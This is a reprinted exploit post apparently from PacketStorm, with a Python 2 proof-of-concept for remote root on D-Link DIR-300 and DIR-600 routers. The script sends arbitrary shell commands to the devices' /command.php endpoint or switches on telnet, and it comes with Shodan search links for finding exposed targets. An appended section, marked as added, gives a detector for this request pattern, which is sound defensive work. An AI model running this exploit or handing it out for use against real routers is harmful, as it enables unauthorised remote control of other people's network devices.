Praetorian503

D-LINK DIR-300 / DIR-600 Remote Root

This exploit demonstrates the remote root vulnerability discovered by Michael Messner in D-Link DIR-300 and DIR-600 devices.

#!/usr/bin/python
# D-LINK TOTAL FAIL
# http://www.s3cur1ty.de/m1adv2013-003
# Another Shit PoC by infodox
# SHODANS BELOW
# http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-300
# http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-600
# Who knew a shell could be so easy?
# Python 2 script (print statements, raw_input)
import sys
import requests
import os

if len(sys.argv) != 3:
    print "Usage: ./dlinkroot.py <target> <mode>"
    print "Modes: shell or telnetenable"
    print "I was lazy so I assume you have a telnet client"
    sys.exit(0)

target = sys.argv[1]
mode = sys.argv[2]

def shell(target):
    # Pseudo-shell: each input line is POSTed as the "cmd" field to /command.php
    print "[+] Connecting and spawning a shell..."
    while True:
        try:
            bobcat = raw_input("%s:~# " %(target))
            lulz = "cmd=%s;" %(bobcat)
            url = "http://" + target + "/command.php"
            hax = requests.post(url, lulz)
            print hax.text
        except KeyboardInterrupt:
            print "\n[-] Quitting"
            sys.exit(1)

def telnetenable(target):
    # Asks the device to start telnetd, then hands over to the local telnet client
    lulz = "cmd=telnetd;"
    url = "http://" + target + "/command.php"
    print "[+] Trying to enable telnet"
    try:
        hax = requests.post(url, lulz)
        print hax.text
    except Exception:
        print "[-] IT FAILED IT!"
        sys.exit(0)
    print "[+] Doing a telnet"
    try:
        # The format operator belongs inside the call, applied to the string
        os.system('telnet %s' % target)
    except Exception:
        print "[-] IT FAILED IT!"
        sys.exit(1)

if mode == "shell":
    shell(target)
elif mode == "telnetenable":
    telnetenable(target)
else:
    print "[] WHAT THE FUCK YOU'RE DOING IT WRONG!"

Source: PacketStorm
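
A detection check for the request pattern the PoC above produces, added here as an example; it is not part of the original post or the PacketStorm code. It assumes raw HTTP requests are available from a capture or proxy in front of the router's web interface; the function names and the sample requests are constructed for illustration.

```python
from urllib.parse import urlsplit, unquote_plus

SUSPECT_PATH = "/command.php"   # endpoint the PoC posts to
SUSPECT_FIELD = "cmd"           # body field the PoC sends

# Constructed sample requests (not captured traffic).
SAMPLES = [
    b"POST /command.php HTTP/1.1\r\nHost: 192.0.2.1\r\n"
    b"User-Agent: python-requests/2.0\r\nContent-Length: 12\r\n\r\ncmd=telnetd;",
    b"GET /index.php HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n",
    b"POST /login.php HTTP/1.1\r\nHost: 192.0.2.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n\r\nuser=admin&cmd=x",
]

def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        raise ValueError("malformed request line")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return parts[0].upper(), urlsplit(parts[1]).path, headers, body

def inspect(raw):
    """Return a finding dict if the request matches the PoC pattern, else None."""
    try:
        method, path, headers, body = parse_request(raw)
    except ValueError:
        return None
    if method != "POST" or path.lower() != SUSPECT_PATH:
        return None
    # The PoC hands requests.post() a plain string, so no form Content-Type
    # is sent; parse the body regardless of the declared type.
    fields = {}
    for pair in body.decode("latin-1").split("&"):
        name, _, value = pair.partition("=")
        fields[unquote_plus(name)] = unquote_plus(value)
    if SUSPECT_FIELD not in fields:
        return None
    return {"path": path, "command": fields[SUSPECT_FIELD],
            "user_agent": headers.get("user-agent", "")}

def scan(requests_seen):
    """Run inspect() over an iterable of raw requests; keep only the hits."""
    return [hit for hit in map(inspect, requests_seen) if hit]

if __name__ == "__main__":
    for finding in scan(SAMPLES):
        print("ALERT", finding)
```

Matching on path and field name rather than on Content-Type or User-Agent keeps the rule effective when the client is changed; the logged `command` value shows what the device was asked to run.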
